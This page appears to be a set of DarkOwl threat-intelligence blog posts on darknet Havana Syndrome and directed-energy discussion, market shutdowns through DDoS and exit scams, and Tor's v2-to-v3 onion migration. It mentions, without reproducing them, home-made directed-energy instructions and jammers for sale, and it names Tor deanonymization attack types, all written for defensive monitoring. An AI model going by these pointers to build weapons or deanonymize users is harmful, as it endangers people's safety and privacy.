A darknet discussion forum user talks of Active Denial Systems (ADS) to cause a sensation of being on fire for crowd control. (Source: DarkOwl Vision – DocID 1b851c844c50ed2099adce8ba48e4963146dc6b3)

The same darknet service also highlights a similar technology called the 5P-42 Filin that has purpotedly been in production since 2019 by the Russian military. This technology allegedly uses a pulsed beam of light to disrupt a target’s vision and cause temporary nausea.

According to additional open-source reporting, the Filin, also known as the “Eagle Owl” in Russian, was originally manufactured for use on large naval warships and frigates by Russian state military contractor, Ruselectronics, and considered a “weapon of mass disorientation.”

A ground-based portable version of the same system is in development (if not already in production) for use by special forces in close-combat anti-terrorism operations.

Brochure detailing technical specifications of the Russian 5P-42 Filin Weapon System. (Source)

AHIs on the darknet and deep web: AHI technologies for sale and hobbyist experimentation

DarkOwl analysts also observed that EMF-based technologies and associated hardware could be purchased from darknet marketplaces and improvised using COTS products to conduct targeted rogue AHIs and human neurological experimentation.

During the course of our investigation, we also uncovered evidence of electromagnetic frequency generators, designed for jamming wideband telecommunications signals such as: GSM, LTE, and GPS for sale on darknet marketplaces for under $500 USD.

With the knowledge provided across other darknet and OSINT sources about ADSs, the device could be easily improvised and repurposed for a malicious objective. DarkOwl detected an advertisement for limited quantities of a military-grade frequency jammer in September 2020 for $1,200 USD.

The documents shared on that darknet domain includes specific frequencies and intensities of unique RF and DE waveforms to cause specific bioeffect and could be easily replicable by hobbyist electrical engineers with access to darknet and deep web content.

In one circumstance, a San Francisco-based Medium user known as “Jay” has purportedly been “targeted by DEW [directed energy weapons] for the last four years” and has since been researching directed energy extensively to better understand the threat. As of November 2018, he had concluded the frequency of the threat fell within the range of 18 and 50 GHZ conducting measurements with commercially off the shelf (COTS) Narda and Trifeld electromagnetic frequency (EMF) meters.

Other deep web sites also include posts with detailed step-by-step instructions for how to make “Home Made” Active Denial Systems using commercially-available 2.4GHz wavelengths using items readily available inside someone’s residence. The author implies the length of the 2.4GHz waveforms can remotely induce headaches, fevers, cataracts, or other chronic-fatigue symptoms in a human target.

“Home Made” Directed Energy Weapon described on the deep web (Source redacted for security purposes)

AHI conspiracy theories on the darknet and deep web

At the conclusion of our analysis, we determined that most of the content related to AHIs from underground darknet and deep web sources is driven by conspiracy theories. For example, in July 2021, one user on a Telegram channel postulated that “Havana syndrome” and “Monkeypox” were a concerted agenda to cover up adverse reactions from the COVID vaccination.

By and large, this type of fear, uncertainty, and doubt is widely circulated and quite popular across the deep web, in particular, “anti-vax” communities and clearly not remotely accurate, given AHIs were recorded well before the COVID-19 pandemic.

Source DarkOwl Vision DocID: 5c860642d80f221e6a86199fb915877285140bea

Long before reports of AHIs surfaced in public news media, the darknet and its associated underground communities housed a considerable population of anti-government advocates with deep rooted beliefs in a “deep-state” – including the notion that western governments sanction and/or actively conduct non-consensual psychological and neurological experiments on its populations.

Believers are equipped to evangelize other forum and chatroom members, armed with reports relating to government projects like Mk Ultra, NSA’s TEMPEST, and “Silent Talk” and detailed research pertaining to peripheral topics such as synthetic telepathy, active denial systems, and psychotronic influence. Many times, such users are quickly labeled “tin-foiled hats” and easily dismissed; however, DarkOwl analysts have witnessed their influence increase since the Guardian published information leaked by Edward Snowden and increased circulations of reports of AHIs outside of Cuba and China.

Some darknet discussion forum users assert they had been directly attacked with directed energy attacks in a similar fashion to AHIs of deployed State Department personnel. There is no way to confirm the veracity of such statements.

Darknet users discussing the Havana Syndrome (Source: DarkOwl Vision -DocID: 47c5b3b89f1176fe6f025b3346af860fcb680d49)

Some deep web users have also been circulating blog content from the surface web that supports the idea of a global New World Order with the ability to control mass populations and targeting individuals with AHI for a specific and often nefarious agenda. Users point to the persecutory delusion known as “gang stalking” and associated websites replete with technical and academic content in attempt to legitimize their conspiracy theory and their perception of being targeted directly by the government.

  • According to DNS records, the blog referenced above (gangstalkingmindcontrolcults.com) is hosted on a server at the IP address: 192.124.249.178 and is located in Menifee, California.

Conclusion

During the course of our research, our analysts identified a significant quantity of Havana Syndrome-related information across numerous sources in the underground. Much of this information is directly tied to anti-US propaganda, disinformation campaigns, and baseless conspiracy theories. However, there is also legitimate information on active denial directed energy weaponry circulating in a violence-inciting atmosphere on the deep and dark web, which can easily enable and embolden an ordinary person’s ability to successfully carry out sinister attacks using AHI technology.


Curious about something you’ve read? Interested to learn more? Contact us to learn how darknet data applies to your use case

Disappearance of Darknet Markets Point to Potential Exit Scams or Seizures  

After observing unusual darknet marketplace activity over the past few weeks, our analysts performed a retrospective investigation that uncovered a widescale shift of the active-marketplace spectrum. This investigation was prompted by the observation that, over the last two weeks, a number of prominent darknet marketplaces suddenly went offline without any indication of their return, or any explanation regarding the cause of their disappearance. Upon further analysis, data demonstrated that in late December, URLs for over 30% of the known darknet markets operating on Tor would not load. The volume of downed marketplaces prompted DarkOwl’s team to take a closer look, only to discover an underground community as perplexed as we were.

Was this the result of a coordinated marketplace Exit Scam?

Figure 1: Graph depicting the status of darknet markets over the last 9 weeks

In response to this sudden mass-closure of darknet markets, users on the popular discussion forum, Dread suggested that it was a concerted “Exit Scam.” So, what is an exit scam?

The darknet is home to many a scammer and darknet marketplaces have historically been a high-stake risk for buyers, who will often deposit cryptocurrency on the market “in escrow” to transact through the market with illicit goods’ vendors. Over the years, DarkOwl has witnessed several marketplaces shutdown without warning to their buyers or vendors and escape with several million dollars’ worth of their customers cryptocurrencies in the process. This can occur similarly with vendors who take their buyers funds for a good or service and never deliver. Either scenario is referred to as an “exit scam.”

Very few marketplace administrators publicly “retire” and gracefully shutdown their operations like White House Market (WHM) did back in October 2021.

More often, the darknet rumor mill across forums and discussion boards hints at the potential “exit scam” of a market a few weeks prior to its disappearance. For example, when Wall Street Market (WSM) shutdown in April 2019, it was believed that WSM admins had exit scammed their buyers and vendors with one moderator further attempting to extort the market’s users for 0.05 BTC or risk them leaking their known physical addresses of record from transacting on the market. Shortly after Germany’s criminal police unit, known as Bundeskriminalamt (BKA) announced they had seized the market, its digital infrastructure, and arrested at least three administrators in Germany.

Tracking the online/offline status of darknet markets per week

DarkOwl analysts compiled the following table, which tracks the status of each darknet marketplace in question over the course of the weeks during which the heightened activity occurred.

A market’s status is changed to CLOSED once the market has been OFFLINE for 3 to 4 weeks in a row or the administrator of the market has announced retirement or exit scam on a public discussion forum or Dread subdreadit.

Figure 2: Chart depicting the status of darknet markets over the last 9 weeks

Did persistent DDoS attacks lead to marketplace admin retirements?

Other theories around this shift in the market point to the potential scenario of administrator burnout and subsequent retirement after reportedly repeated DDoS attacks in recent months.

In the middle of December, Torrez Market officially stated their retirement with the market admin, known as mrBlonde, advising darknet users to “use common sense” and avoid using an “established market” stating that as the older the market gets, the more likely it will be to collapse.

Shortly before the new year, a DDoS attack appeared to have affected a handful of markets, including Cartel Market who posted they were experiencing outages which took the market without any official word from their administrator. Vendors on the market suggest they lost access to their accounts prior to the DDoS attack.

Around the same time Cannazon also suffered from DDoS attack and then posted they were “retiring” and not pulling an exit scam.

“Everyone knew this day would come. No market will be here forever. We are officially retiring.”

— Cannazon Team PGP Message

DDoS attacks prior to market shutdown have been analogous with the “canary-in-the-coal-mine” to a market seizure by an international law enforcement effort. Law enforcement could have easily taken over the Cannazon admins’ accounts and posted the PGP message on Dread. Nevertheless, there are some indications from the darknet community that a war between marketplaces has emerged in recent week with DDoS as the weapon of choice.

As of time of writing, users from World Market stated they were getting 502 errors and the market appeared to be under heavy DDoS attack. Two days ago, the market administrator, Lovelace posted a message directed at Dark0de claiming the competitor market team were using a circuit tool attack (DDoS) against World Market’s main mirror and ASAP Market. The comments included a lengthy post by DeSnake, the administrator of the recently revitalized AlphaBay Market.

Coincidentally, the URLS for the market called “Potluck Market” since mid-November, have been redirecting to World Market. Potluck market supposedly closed back in late 2020 after a scandal ensued when the market staff hired a known pedophile. Potluck staff member, Florida, shared how equally important verifying staff before hiring is to OpSec in a lengthy post on Dread shortly before the closure.

Late last week, Dark0de was also inaccessible and two weeks ago the market’s admin posted they too were under DDoS attack on their Dread subdreadit.

DarkFox market was offline for over 5 days for “maintenance” and many Dread users feared it too was exit scamming, but as of time of writing, the market appears back online and stable along with a new mirror equipped with “anti-DDoS filters.”

On a German discussion forum, one user posted that they believe Monopoly Market – offline since the end of 2021 had also exit scammed.

Users on Dread have been equally concerned with posts titled “RIP Monopoly” on their subdreadit. The moderator for the subdreadit, ShakyBeats, proposed locking down the board until word from the market administrator was heard. Another user indicated that the exit scam theory was weak considering a week before it went down the administrator launched an “update” to the market server software that updated critical dates of the vendor and buyer’s activities for orders on the market. The user theorized this would be lost effort if the administrator had planned to scam a week later.

Notably, after the DDoS attack that impacted Cartel, around the end of December, several markets including: ASAP, Yakuza, TOR2Door, Monopoly, Archetype, and TOR Market all went offline and seemingly headed to a “CLOSED” status. But this week, TOR2Door and TOR Market rallied back online.

Versus Market, a popular market throughout 2020 and offline since early November after enabling DDoS protection, also suddenly reappeared operational without any announcement of their return.

Four other markets: Quest, Hermes, Nemesis, and MGM Grand also appeared back online after being offline since early November. DarkOwl has no indication these market administrators are working together, but their appearance all at the same time is suspicious.

–   DarkOwl Vision has knowledge of Nemesis market since fall of 2021, and their market launch page claims they have been operational since May 2021. The subdreadit for the market, /d/NemesisMarket has been banned for rules violations, suggesting this market may have been run by scammers.

–   The Hermes subdreddit appeared on Dread a year ago with a post claiming they had 500 users registered from their market moderator, Stitch3s. There has been no new activity since the re-launch.

Final Thoughts

DarkOwl determined during this quick analysis that darknet markets are experiencing instability with many markets either under heavy DDoS and possibly on the verge of exit scam. DarkOwl believes Monopoly, Cartel, Yakuza, and Archtype are offline permanently and Torrez and Cannazon exited due to retirement.

While some suspect that it was a large-scale Exit Scam operation, others have hinted that it could be the by-product of an international law enforcement operation. Interestingly, at the end of last week, seven of the markets that were previously offline and had been assessed as closed permanently appeared from the ashes, only eliciting further skepticism around the markets and their credibility in general.

It’s unclear whether the DDoS activity against the markets that have recently disappeared is related to a law enforcement activity as the Justice Department has yet to post any seizure banners or make any official announcements. DarkOwl will continue to follow this closely and provide more information as it comes available.


Curious about something you’ve read? Interested to learn more? Contact us to learn how darknet data applies to your use case

Tor project announces domain name scheme shift

Last summer, the Tor Project announced that in October it would be ending support for its legacy v2 domain naming scheme, and began encouraging darknet administrators to start migrating their hidden darknet websites – known as onion services – to the more secure v3 address scheme. For non-technical users of the Tor anonymous network, this seems inconsequential nor applicable to them, except Tor’s onion service addressing nomenclature – designated as v2 versus v3 – is the primary mechanism by which services hosted on the network are accessed.

Maintaining persistent access and knowledge of this darknet landscape is critical to provide continuous coverage of data from the dark web.

When the projected time of the cutover came in mid-October, Tor services were not immediately “shut off” and inaccessible as expected. Tor project removed v2 introduction points with Tor version 0.4.6, but the effects are only realized for relay operators that updated their node with the latest software version.

Within that month, Tor Project did update the Tor Browser to version 10.5.10 disabling v2 and rendering v2 onion services unavailable. However, DarkOwl discovered depreciated v2 onion services are still accessible with legacy browser client executables. Then, just this week, Tor Project released Tor Browser 11.0.1 which includes additional features like a blockchain explorer.

Now that v2 onion services are no longer supported by the Tor Project, DarkOwl estimates a decrease of 62% of known onion services across the Tor network.

Screen Shot 2021-10-16 at 4.28.55 PM.png

In the last year, many onion services providers on Tor have published both a v2 and v3 address, which replicates their website content on both address types to ease the transition and “mirror” the content accordingly, thereby minimizing content loss. Read below for more details on the evolution of the different onion service address types and why v3 addresses are preferred.

How Many Tor v3 Onions Have Emerged?

DarkOwl maintains one of the largest databases of Tor darknet content, including historical and “deep” darknet records. DarkOwl’s crawlers monitor the Tor network for mentions of Tor onion services and schedules new v3 addresses discovered for crawling and indexes the content into its searchable Vision SaaS platform for its clients to access.

Due to the nature of the network and its privacy focused topology, it is impossible to quantify the real number of services operating on the network at any given time. V2 onion descriptor information is stored in plain text in the hidden service directory (HSDir) and at one time, provided some indication of the volume of services available, but such information is not available for v3 services.

In fact, according to Tor Project metrics, there could be upwards of 600,000 v3 onion services active in the network, but that number is extrapolated from relays operating as onion-service directories.

A recent technical blog on v3 onion services suggests many of the v3 services are “barely used” – or setup to merely act as slave services for a malicious botnet.

In the last six weeks, DarkOwl’s Vision platform has observed an average of 104,095 active .onion services across both address schemes of which: 62% are v2 addresses and 38% are v3 addresses.

These numbers are determined by a daily snapshot of DarkOwl’s collection stack seeded by DarkOwl’s network intelligence gleaned by crawling the network 24/7 since 2016. These numbers are not reflective of the true total number of onion services active in the network on any given day.

DarkOwl analysts also noted that during the month of July 2021, when the option to create new v2 onion services was removed from the codebase by Tor Project, DarkOwl Vision witnessed a surge in new v3 addresses and identified 2963 new v3 onions in the last two weeks of July alone.

Figure 1: Average Number of Onion Services Online According to DarkOwl’s Database

Tor Users Respond

Most Tor onion service providers have embraced the network address deprecation and encouraged its visitors to add their new v3 address to their browser bookmarks.

Some darknet website administrators assumed the v2 onion services were inaccessible back in July and disabled all their v2 addresses when the Tor Project simply disabled the creation of new services in the 0.4.6. release last summer.

Figure 1 Tor Onion Service Provider’s Depreciation Announcement on I2P. Source DarkOwl Vision Document

Figure 2: Tor Onion Service Provider’s Depreciation Announcement on I2P. Source DarkOwl Vision Document

Other users are skeptical of the shift, especially those that firsthand experienced multiple concerted v3 onion service outages in January. All v3 onion services were offline for more than 3 hours at a time when the consensus health check failed, due to excessive traffic directed at the directory authorities – possibly due to uncontrolled DDoS between darknet markets.

According to the Tor Project, the implementation bug was fixed in the July 0.4.6 release to default to a “reasonably live” version of the consensus health when a “live” consensus is unavailable.

Figure 2 Source DarkOwl Vision Document about v3 domain outage due to consensus health

Figure 3: Source DarkOwl Vision Document about v3 onion service outage due to consensus health

History of Tor & Decentralized Network Security

The original purpose of the “The Onion Router” (Tor) protocol was to provide US government intelligence operatives in the field secure communications without compromising their digital or physical location. In 1996, the first “0th generation” onion router (OR) was setup as an experiment in encrypted network topography in a virtual environment on a single computer. Because it included export-restricted technology, the “1st Generation” Tor was developed and successful in its mission of providing a concealed internet for the US government for several years. By the year 2000, the “1st generation” Tor had reportedly served upwards of 5 million network accesses a day. In 2003, the “2nd Generation” Tor came along with network improvements, hence where the term “onion v2” originates. DarkOwl Vision Users Can Read More in DocID – f4dafdd81bd9dac95d017a84d4c39d1c71f7dd5f

In 2006, when the US Naval Research Laboratories handed over Tor to a group of volunteers at the Tor Project, the network’s purpose was to provide a decentralized, censorship resistant platform for users to communicate and share information.

The Tor platform quickly became a haven for criminal activity, facilitating anonymous communication across underground digital communities and forums, elaborate drug marketplaces, child pornography and human trafficking. Consequently, deanonymizing onion services hosting criminal content has been a focus of many three-letter acronyms government and law-enforcement (LE) agencies around the world. Academic researchers and computer network science experts have received numerous grants and government funding to extensively study deanonymization attack methodologies and many journal publications exist.

Over the years, DarkOwl has witnessed successful deanonymization through various techniques including rendezvous point circuits (a.k.a. the cookie attack), time-correlation attacks, distributed denial of service attacks, which often force a criminal onion service to a LE-controlled guard node, (a.k.a. sniper attack), and circuit fingerprinting attacks.

Tor Project states that v3 onion service addressing is secure against enumeration attacks as well as other attacks that aren’t related to keys.

  • An adversary who runs a relay on the Tor network can slowly learn a list of all the v2 onion services, via the v2 HSDir system.
  • An adversary who can factor 1024-bit RSA keys can impersonate a v2 onion service.
  • An adversary who can generate around 2^40 RSA keys can expect to generate two that correspond to the same onion address (a collision attack).

Earlier this year, German researchers published a TLS traffic analysis attack methodology, demonstrating 100% successful Tor onion service deanonymization in 12.5 days or less.

Tor v2 versus v3

Tor onion service addresses are intentionally not memorable, relying on a random string of non-mnemonic characters and numbers followed by the “.onion” top level domain (TLD). This string is automatically generated when the onion service is originally configured using a public key.

V3 onion service addresses are discernible by their lengthy 56-character address, e.g. Tor Project’s v3 address looks like: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid[.]onion, where its v2 address is 16-characters: http://expyuzz4wqqyqhjn[.]onion.

The 16-character v2 address hashes represent an 80-bit number in base32 that contains the RSA public key of the onion service, where the v3 is 256-bit representation of its Elliptical Curve Cryptography (ECC) public key. Therefore, the onion service address is essentially a cryptographic representation of the originating domain’s information and a principal justification for network administrators encouraging exclusively using a more secure form of addressing.

The v3 address utilizes SHA3/ed25519/curve25519 cryptography which is considerably more secure than v2’s SHA1/DH/RSA1024 address encryption. The v2 addresses have been the standard for 15 years and the network overdue for a more secure mechanism to become standard.

The Tor Project announced it would be deprecating the v2 address format in July 2020 and outlined a specific timeline of the depreciation process, first removing the option to create new v2 onion services earlier this year and and releasing a new network client and browser in October that rendered v2 onion services inaccessible.

1. September 15th, 2020

0.4.4.x: Tor will start warning onion service operators and clients that v2 is deprecated and will be obsolete in version 0.4.6.

2. July 15th, 2021

0.4.6.x: Tor will no longer support v2 and support will be removed from the code base.

3. October 15th, 2021

Release Tor client stable versions for all supported series that will disable v2 entirely.

Tor Development Continues and v2 [WARN]

In July, Tor Browser began displaying a “deprecated soon” warning message every time a v2 onion service was accessed. Since mid-October, instead of the warning page, the Tor Browser client logs records numerous [WARN] messages when the client accesses a legacy v2 onion service, despite displaying the website contents in the browser.

Figure 3 Depreciation Warning Notification on all v2 Onion Services from July 2021 onward

Figure 4: Deprecation Warning Notification on all v2 Onion Services from July 2021 onward

According to the developer’s comments on the Tor Project’s Github, eliminating v2 from the Tor network involves:

o   Modifying HSDir to stop accepting or serving v2 descriptors

o   Introduction points will stop allowing introductions for v2.

o   Refusing the TAP connection from the service side for rendezvous points.

Figure 5: Tor Browser Application Logs Warning of Depreciated Onion Service Connection. Tested with TBB version 10.5.8.

These changes were scheduled to be released with version 0.3.5.x-final, but the actual release date of that update is unclear and no due date specified. Even though the introduction points no longer allow for v2 onion service address introductions, the effects of this will not actually be realized until every relay operator updates to the latest version of the Tor executable with these latest changes.

In early October, Tor Developer David Goulet edited Tor Project issue #40476 removing the 3rd bullet above stating:

“I decided to NOT remove the Rendezvous code path for TAP connections as it would create more complexity to the patch for which I'm trying to keep minimal.” - David Goulet, Tor Developer

Goulet merged the ticket with the disable SOCKS connections for v2 addresses in mid-October and closed the ticket.

Interestingly, in version tor-0.4.7.2-alpha, last modified less than a month ago, developer release notes focus on a new consensus method for v3 network congestion control and closes ticket #40476 by returning “bad hostname” for v2 onion service addresses.

Onion service v2 addresses are now not recognized anymore by tor meaning a bad hostname is returned when attempting to pass it on a SOCKS connection. No more deprecation log is emitted client side. Closes ticket 40476.

As of October 26th, Tor source code version 0.4.7.8 was available for download from the Tor Project and appears to incorporate all the changes mentioned above. One minor difference our analysts noted that the changelog states, “Send back the extended SOCKS error 0xF6 (Onion Service Invalid Address) for a v2 onion address” instead of “bad hostname.”

And v4 is already here

In 2019, rumors of a v4 onion service address emerged and many Tor onion service network administrators supposedly already mirror their content on v4 addresses.

The v4 onion services reportedly uses less CPU computational activity and subsequently less electricity to reduce e-pollution. There is allegedly also additional error handling, improved bootstrap reporting, and support for adaptive circuit padding to prevent time-based deanonymization attacks.

DarkOwl has not observed any v4 addresses in the network, nor has Tor Project released any documentation about v4 addresses for confirmation or analysis.


 Curious about something you’ve read? Contact us to learn how darknet data applies to your use case

Copyright © 2022 DarkOwl, LLC All rights reserved.
Privacy Policy
DarkOwl is a Denver-based company that provides the world’s largest index of darknet content and the tools to efficiently find leaked or otherwise compromised sensitive data. We shorten the timeframe to detection of compromised data on the darknet, empowering organizations to swiftly detect security gaps and mitigate damage prior to misuse of their data.